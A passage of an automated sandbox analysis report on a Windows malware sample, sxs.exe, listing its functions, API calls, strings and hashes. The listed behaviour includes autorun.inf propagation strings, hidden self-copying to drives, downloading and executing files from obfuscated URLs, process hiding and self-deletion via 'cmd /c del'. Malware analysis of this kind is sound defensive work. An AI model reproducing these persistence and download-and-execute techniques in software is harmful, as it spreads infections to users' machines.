                                                                            • Instruction Fuzzy Hash: 31715370610108ABCB00FBA6C952A8E77B9AF84709F50853BB501B72D2CB7DAF11875D
                                                                            Function 00405FB0 Relevance: 30.0, APIs: 11, Strings: 6, Instructions: 211fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDriveTypeA.KERNEL32(00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 0040601B
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 0040607C
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000006,00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 0040609C
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 004060C4
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000080,00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 004060E7
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000080,00000000,00000080,00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 00406105
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,00000000,00000080,00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 00406123
                                                                            • GetModuleFileNameA.KERNEL32(00400000,00000000,00000104,00000000,00000000,00000000,00000080,00000000,00000080,00000000,00000000,004062A6), ref: 00406147
                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00406178
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000000,00000000,00000080,00000000,00000080,00000000,00000000), ref: 00406254
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000006,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000000,00000000,00000080,00000000,00000080), ref: 00406274
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: File$Attributes$Delete$CopyDriveModuleNameType
                                                                            • String ID: [AutoRun]$\autorun.inf$\sxs.exe$open=sxs.exe$shell\Auto\command=sxs.exe$shellexecute=sxs.exe
                                                                            • API String ID: 4177304369-1696378998
                                                                            • Opcode ID: 72d8dda25f6a390e220326f2fa1f3eb7fa1cc818a7441e36ca5d2b25cd339c85
                                                                            • Instruction ID: 5df22afb16b272ec04df581e562d200e9037b34e0cc2cdfdfd0487ba17cb2571
                                                                            • Opcode Fuzzy Hash: 72d8dda25f6a390e220326f2fa1f3eb7fa1cc818a7441e36ca5d2b25cd339c85
                                                                            • Instruction Fuzzy Hash: C1711070A10508ABCB00FBA6C956A9F7779AF84709F50417BB501BB2D2CB7CAF05879D
                                                                            Function 004055D8 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 192filesleepnetworkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405663
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00405874,?,00000000,00000000,?,004066FD,00406725,?,00000000,?,00407FF7,00000001,00000000,00000001), ref: 00405675
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 0040569A
                                                                            • Sleep.KERNEL32(00000BB8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405874,?,00000000,00000000,?,004066FD,00406725,?), ref: 004056A8
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00405750
                                                                            • Sleep.KERNEL32(00000BB8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405874,?,00000000), ref: 0040575E
                                                                            • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004057E2
                                                                            • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004057EC
                                                                            • DeleteFileA.KERNEL32(00000000,000003E8,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004057FE
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405810
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405822
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00405854
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: Delete$File$CacheEntrySleep$Download$ExecuteShell
                                                                            • String ID: `tn{*q~w$kucm$lqrs>*)nwb(wimg`o`t-gjk,`jqm*q~w
                                                                            • API String ID: 4037061717-2671944630
                                                                            • Opcode ID: 1c8cd680d199ee75ae8e0b8104fb0c675f8e60050fccb8e235921e10a6a504ae
                                                                            • Instruction ID: 785d72677e56ec84aa5b7725342f13d88417e98dc42c661718efd2ccd2bec02f
                                                                            • Opcode Fuzzy Hash: 1c8cd680d199ee75ae8e0b8104fb0c675f8e60050fccb8e235921e10a6a504ae
                                                                            • Instruction Fuzzy Hash: 1C61EE706111059BDB00FBA6D986E8E77B8EF45709F10447AF500BB2E3DA78ED048B9D
                                                                            Function 00405D7C Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 127filesleepnetworkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405E02
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,00405F3C,?,00000000,00000000,00000000,00000000,00000000,?,00406707,00406725,?,00000000), ref: 00405E14
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00405E39
                                                                            • Sleep.KERNEL32(00000BB8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405F3C,?,00000000,00000000,00000000,00000000,00000000), ref: 00405E47
                                                                            • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000003), ref: 00405EEE
                                                                            • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405F3C), ref: 00405EF8
                                                                            • DeleteFileA.KERNEL32(00000000,000003E8,00000000,00000000,00000000,00000000,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00405F0A
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405F1C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: Delete$File$CacheEntrySleep$DirectoryDownloadExecuteShellWindows
                                                                            • String ID: A}vokwcq*`~f$`tn{5+r{p$kucm$lqrs>*)nwb(wimg`o`t-gjk,p`gm5+r{p
                                                                            • API String ID: 2803323816-32510556
                                                                            • Opcode ID: fce217dd2fc4c81ae6cb59f19938d9cdb7092590b9e8a6cfcb65c9ebfc36680a
                                                                            • Instruction ID: 62040580da8bc4b8ed49dd40f25ba5acd27351cacc19992f52bcfc8538425eb2
                                                                            • Opcode Fuzzy Hash: fce217dd2fc4c81ae6cb59f19938d9cdb7092590b9e8a6cfcb65c9ebfc36680a
                                                                            • Instruction Fuzzy Hash: 6241BC74711105ABD700FF6AD946A4E77B8EF85709F10407BB940BB2E3CA78AE018A6D
                                                                            Function 004025DC Relevance: 16.6, APIs: 9, Strings: 2, Instructions: 109COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharNextA.USER32(00000000,?,00000000,00000000,?,0040270E), ref: 00402613
                                                                            • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040270E), ref: 0040261D
                                                                            • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040270E), ref: 0040263A
                                                                            • CharNextA.USER32(00000000,?,00000000,00000000,?,0040270E), ref: 00402644
                                                                            • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040270E), ref: 0040266D
                                                                            • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040270E), ref: 00402677
                                                                            • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040270E), ref: 0040269B
                                                                            • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040270E), ref: 004026A5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: CharNext
                                                                            • String ID: "$"
                                                                            • API String ID: 3213498283-3758156766
                                                                            • Opcode ID: 5093a5edd9145d7613c737a5e25656be4a5b57bdaeaac2877119e0e25e71438b
                                                                            • Instruction ID: 378b31890ac25dcdd700d67078953c889e09c483e5a359b479ed21abc8ee7f2f
                                                                            • Opcode Fuzzy Hash: 5093a5edd9145d7613c737a5e25656be4a5b57bdaeaac2877119e0e25e71438b
                                                                            • Instruction Fuzzy Hash: 1921E8606043912ADF3129754EC836B6B894A1B704B680DBB95C1BB3C7D4FE488B976E
                                                                            Function 00408A20 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 75windowtimeregistryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadIconA.USER32(00000000,00007F00), ref: 00408A4E
                                                                            • LoadCursorA.USER32(00000000,00007F00), ref: 00408A5D
                                                                            • RegisterClassA.USER32(0042AE18), ref: 00408A7A
                                                                              • Part of subcall function 00404414: CreateWindowExA.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040443D
                                                                            • SetTimer.USER32(00000000,00000001,000005DC,004084C8), ref: 00408AD0
                                                                            • TranslateMessage.USER32(0042AE44), ref: 00408AE0
                                                                            • DispatchMessageA.USER32(0042AE44), ref: 00408AE6
                                                                            • GetMessageA.USER32(0042AE44,00000000,00000000,00000000), ref: 00408AF2
                                                                            • KillTimer.USER32(00000000,00000000,0042AE44,00000000,00000000,00000000,?,?,00408D8D,00000000,00000000,00000000,00000000,00400000,00000000,00000104), ref: 00408B0B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: Message$LoadTimer$ClassCreateCursorDispatchIconKillRegisterTranslateWindow
                                                                            • String ID: bbyb
                                                                            • API String ID: 638683977-2792963345
                                                                            • Opcode ID: 533d18086f9685caa9f334b0e65846936dc3ea56f5248619355b98ba92471b9b
                                                                            • Instruction ID: 3bba51ca83177c78f7b5e7647297d040befd782e8eab32064d4fce7d17e62b12
                                                                            • Opcode Fuzzy Hash: 533d18086f9685caa9f334b0e65846936dc3ea56f5248619355b98ba92471b9b
                                                                            • Instruction Fuzzy Hash: 82213EB0780701AFD720EF659D42F1736E8AB44704F10593EBA45FB6D2DBB8A8118B5C
                                                                            Function 004053F6 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 77windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetClassNameA.USER32(?,?,00000100), ref: 00405443
                                                                            • SendMessageA.USER32(?,0000000D,00000100,?), ref: 0040547E
                                                                            • SendMessageA.USER32(?,0000000C,00000000,00405588), ref: 004054F9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$ClassName
                                                                            • String ID: Edit$lqrs>*)tsr(gra`lvjhf*fin+$lqrs>*)tsr(lj``lvapg*fin+
                                                                            • API String ID: 787153527-2237947760
                                                                            • Opcode ID: c2eb696905c10da3cfedb0ffb1c73e7a88a6af273a9ce6182ee53f48f0eb6ae6
                                                                            • Instruction ID: 9fb5fde48b0b51318b29d690c95603ab6f24dde2ee0048554a78b08ccb085c6b
                                                                            • Opcode Fuzzy Hash: c2eb696905c10da3cfedb0ffb1c73e7a88a6af273a9ce6182ee53f48f0eb6ae6
                                                                            • Instruction Fuzzy Hash: B3214FB0A4061C6ADB20EF64CC89BDAB7B9EB48304F5045F7B508F6181D6B85E808E98
                                                                            Function 004053F8 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 76windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetClassNameA.USER32(?,?,00000100), ref: 00405443
                                                                            • SendMessageA.USER32(?,0000000D,00000100,?), ref: 0040547E
                                                                            • SendMessageA.USER32(?,0000000C,00000000,00405588), ref: 004054F9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$ClassName
                                                                            • String ID: Edit$lqrs>*)tsr(gra`lvjhf*fin+$lqrs>*)tsr(lj``lvapg*fin+
                                                                            • API String ID: 787153527-2237947760
                                                                            • Opcode ID: 04c82b09afb268f21461838a035d4bfd2e0eff3feaf026e00bce95848d474ef0
                                                                            • Instruction ID: 0425c3d2602aa380be99970c4860828b2cef43e56b29c4e0dd38b7bacb301f0e
                                                                            • Opcode Fuzzy Hash: 04c82b09afb268f21461838a035d4bfd2e0eff3feaf026e00bce95848d474ef0
                                                                            • Instruction Fuzzy Hash: BF2150B094061C6ADB20EF64CC89BDBB7B9EB48304F5045F7A508B7181D7B85F808E98
                                                                            Function 004049CC Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetVersionExA.KERNEL32(?,00408D88,00000000,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000080,bbyb,bbyb,00000000,00408DA8), ref: 004049DA
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00408D88,00000000,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000080,bbyb,bbyb,00000000,00408DA8), ref: 004049F5
                                                                            • GetProcAddress.KERNEL32(00000000,RegisterServiceProcess), ref: 00404A13
                                                                            • FreeLibrary.KERNEL32(00000000,?,00408D88,00000000,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000080,bbyb,bbyb,00000000,00408DA8), ref: 00404A2D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProcVersion
                                                                            • String ID: RegisterServiceProcess$kernel32.dll
                                                                            • API String ID: 493525861-4020013434
                                                                            • Opcode ID: ba7912c793e05f345d12aa31dfe9059e509e26ea0c3e34657816526bc27800df
                                                                            • Instruction ID: 584902bb4f43a048dfb4edc9276af123f762f69e99b58a94aa2e669f31c097c7
                                                                            • Opcode Fuzzy Hash: ba7912c793e05f345d12aa31dfe9059e509e26ea0c3e34657816526bc27800df
                                                                            • Instruction Fuzzy Hash: F6F012F17C13009BD611EB759E0AB1932A4E7E4706F40447BB784B72D1E77D8456CA1E
                                                                            Function 00403174 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403196
                                                                            • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004031E5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004031C9
                                                                            • RegCloseKey.ADVAPI32(?,004031EC,00000000,?,00000004,00000000,004031E5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004031DF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                            • API String ID: 3677997916-4173385793
                                                                            • Opcode ID: 05a39cdded3a68a7272965c21735343be09680b9c2fcd28f0635233796265c19
                                                                            • Instruction ID: 5b13f427154e47eb786ec22587604168a85df8ea8a10eb055b4820c5abfa16c8
                                                                            • Opcode Fuzzy Hash: 05a39cdded3a68a7272965c21735343be09680b9c2fcd28f0635233796265c19
                                                                            • Instruction Fuzzy Hash: 7A019275500308BADB11DF909C42FAA7BBCE709701F6005B6B910F65D1E6799B50D75C
                                                                            Function 004050D8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetEnvironmentVariableA.KERNEL32(Comspec,?,00000104,00000000,00405197), ref: 00405118
                                                                              • Part of subcall function 004026C8: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 004026EC
                                                                            • WinExec.KERNEL32(00000000,004051C8), ref: 00405174
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentExecFileModuleNameVariable
                                                                            • String ID: /c del "$Comspec
                                                                            • API String ID: 451393584-1443122049
                                                                            • Opcode ID: 215997d5803e9b59eb04cb7df286bba4695a682e93fbde3f27ae696503c78bdd
                                                                            • Instruction ID: 6f675109087fc91689d1b7d6d1dc425710a191357d6ada5f1f571d808edafb71
                                                                            • Opcode Fuzzy Hash: 215997d5803e9b59eb04cb7df286bba4695a682e93fbde3f27ae696503c78bdd
                                                                            • Instruction Fuzzy Hash: 74118270E006185FDB25EB61CC02BDABBB9EB49700F5145FBA648F61C1D6F84A808E65
                                                                            Function 004050DC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetEnvironmentVariableA.KERNEL32(Comspec,?,00000104,00000000,00405197), ref: 00405118
                                                                              • Part of subcall function 004026C8: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 004026EC
                                                                            • WinExec.KERNEL32(00000000,004051C8), ref: 00405174
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentExecFileModuleNameVariable
                                                                            • String ID: /c del "$Comspec
                                                                            • API String ID: 451393584-1443122049
                                                                            • Opcode ID: e562fe7082f41e4b9f578b462bb6e237adde477b1983bc868482d80e88f8d696
                                                                            • Instruction ID: 5e39bd01bb10aff84b20b8e8c33debca7a73d60c2ec277af15caf5139dfd1cd6
                                                                            • Opcode Fuzzy Hash: e562fe7082f41e4b9f578b462bb6e237adde477b1983bc868482d80e88f8d696
                                                                            • Instruction Fuzzy Hash: 5E116170E0061C5FDB25EB61CC02BDABBB9EB48700F5145F6A608F61C1E6F85A808E69
                                                                            Function 004017B8 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlInitializeCriticalSection.NTDLL(0040A5B0), ref: 004017CE
                                                                            • RtlEnterCriticalSection.NTDLL(0040A5B0), ref: 004017E1
                                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,00000000,0040186E,?,?,00402052), ref: 0040180B
                                                                            • RtlLeaveCriticalSection.NTDLL(0040A5B0), ref: 00401868
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
